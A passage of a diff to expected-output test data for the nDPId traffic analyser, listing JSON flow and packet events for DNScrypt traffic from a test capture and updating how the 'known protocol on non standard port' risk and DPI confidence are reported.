7RrRRXRHV"}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":606,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":946739727039,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":946739727039,"pkt":"ZmZmZmZmRERERERECABFAADM4h4AADURcPYzDz5BCgAAAQG7gUEAuGT7cjZmbnZXajgLy6Pjk5t+quqLTjthMYRcpmrtygKi+8ge\/d5a\/EggfKFstwqlUcEQ0npRyt3o\/+nrMu7IyAemLvDGwM3nY6O0vBX25jf4NlD5NhKqGUUpFydrLINODy\/Et1yVVHUUL4VBz3CwT8bs4b54QwYXASMjQfnf\/0NTpkvJ+0v2f5ntIAM7o81gzx\/1ovB+r6k93kwem7LHnom40gyZk3GGiIOpwn\/P\/XOKwtE="}
-00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739727039,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":180000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":180000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":180000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00722{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":606,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739727039,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739620053,"flow_last_seen":946739620112,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":37711,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739615603,"flow_last_seen":946739615628,"flow_idle_time":180000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":440,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":60393,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739617004,"flow_last_seen":946739617027,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":50443,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739611961,"flow_last_seen":946739612032,"flow_idle_time":180000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":944,"flow_avg_l4_payload_len":472,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47545,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739614386,"flow_last_seen":946739614411,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":38660,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739660371,"flow_last_seen":946739660417,"flow_idle_time":180000,"flow_min_l4_payload_len":384,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":960,"flow_avg_l4_payload_len":480,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":40958,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":180000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00831{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739861286,"flow_last_seen":946739861286,"flow_idle_time":180000,"flow_min_l4_payload_len":576,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":946739861286,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01231{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":946739861286,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"ts_msec":946739861286,"pkt":"REREREREZmZmZmZmCABFAAJc8z5AAGQR70UKAAABMw8+QZ7jAbsCSDRmPBQECcRLqdjK1L0mf5PIChUIPitfU3P1xdue2oSi59s41xANmFlcDEDim3A5yf0wjjkn7c0KZ99+wsaC8Q0jJNdVtRyvQ4vttz57bauXWf7aWWZI9GXe13Bq\/1R6iUwT\/A0\/zRCc0Ayq9cmcu623YyCddihLAAMnrLyfM6t6rL27MiG1nzMzmCPyF28NwS5XqwjPRfHv4CZ99g0HmhnodYUO8q68IgHhgstyCXs7D74EPnDSNCXWvxBvHIE3vRmyPvunw0teioCjIqxqULRcggjd13KNSzhv65LTFQDOYbWOCn+rymPlyEaTGV8M85qpLCbZBx+P2mZMjdPflMOxEUQrHk9kdqOlL2mWcrX2tI9xOtQuzvv+NeAjtLGeixP59GGL75pvlLSdqyad1gu\/frI3Onyk042MoSYGJ6RwV3eaPNbZQCtEwb9AOFIXBmvRH9XM7npQUXePLACdz9iCTPKnV7Kw8ctrZrqQ4N6l7ZvcAG2rUT+Q9\/LXDXqKjl09ujD68NhiQh61LzaYdfK4i7pycnU4qJoDyh6wqXlEnhJrx33Uml0q43\/LZkKq6+gBtMyFx1G0t8TXOxdVJjjFCI6asgc8Kxe6G3w1FuEYOCYdPJ1BDXSvfQyl+xvLRdx79zlvjoh3CA3lgSqjekZ4r\/nVmPAWeluQHxO36OZiUmB2ai6gs8+TK+H6\/M45c1\/tfkqR+WeZABxv3Wq+MtDzkLR1Ba9KFIEFLcYA\/aPSp26qFfnJhX4KU8kKJXh\/RvHe"}
 00692{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":946739861499,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"ts_msec":946739861499,"pkt":"ZmZmZmZmRERERERECABFAADMBL8AADQRT1YzDz5BCgAAAQG7nuMAuKxVcjZmbnZXajhA4ptwOcn9MI45J+2cfN20Dl9sTMp3rF67X\/jDpIVgb1a+3\/m31lpJBtYvfwV0B9vwzZtjNo+jG7GftQDbJaUY\/oveZ3k2CcZHOjICUKnGXvyF5yEl+85urFpytmNQcYoVHSk5XuOkfP++TbbcrYxYsDH+x2d1Xg60pF+BeHKLrLF0X3ik2Kl1hdwwJCMdJ5w1\/ra7TZUP4kyuPD6WApR9UYb+H+3yIn0="}
-00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":180000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739727013,"flow_last_seen":946739727039,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739861286,"flow_last_seen":946739861499,"flow_idle_time":180000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":752,"flow_avg_l4_payload_len":376,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":40675,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739725845,"flow_last_seen":946739725874,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":36746,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739719617,"flow_last_seen":946739719664,"flow_idle_time":180000,"flow_min_l4_payload_len":418,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":497,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":59812,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":608,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739720236,"flow_last_seen":946739720266,"flow_idle_time":180000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":576,"flow_tot_l4_payload_len":816,"flow_avg_l4_payload_len":408,"midstream":0,"ts_msec":946739861499,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45234,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
